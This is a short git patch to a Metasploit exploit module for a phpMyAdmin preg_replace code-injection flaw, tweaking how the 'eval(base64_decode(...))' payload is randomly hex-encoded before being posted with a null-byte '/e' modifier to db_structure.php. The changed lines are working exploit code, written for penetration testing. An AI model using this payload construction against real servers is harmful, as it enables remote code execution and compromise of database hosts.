From 54233e9fba1419cbf6b2538a3f2f2ede1e8fd5c8 Mon Sep 17 00:00:00 2001 From: Meatballs Date: Fri, 26 Apr 2013 17:46:43 +0100 Subject: [PATCH] Better entropy --- modules/exploits/multi/http/phpmyadmin_preg_replace.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/exploits/multi/http/phpmyadmin_preg_replace.rb b/modules/exploits/multi/http/phpmyadmin_preg_replace.rb index 442ab4f622..40f0da1a51 100644 --- a/modules/exploits/multi/http/phpmyadmin_preg_replace.rb +++ b/modules/exploits/multi/http/phpmyadmin_preg_replace.rb @@ -162,7 +162,7 @@ class Metasploit3 < Msf::Exploit::Remote evil << "selected%5B0%5D=#{db}" evil << "token=#{token}" evil << "from_prefix=%2Fe%00" - evil << "to_prefix=#{Rex::Text.uri_encode('eval(base64_decode(', 'hex-random')}'#{pay}'))" + evil << "to_prefix=#{Rex::Text.uri_encode("eval(base64_decode('#{pay}'))", 'hex-random')}" evil << "mult_btn=Yes" data = "" @@ -174,7 +174,7 @@ class Metasploit3 < Msf::Exploit::Remote data << '&' << evil[i] end end - + exploit_result = send_request_raw({ 'uri' => uri('db_structure.php'), 'method' => 'POST',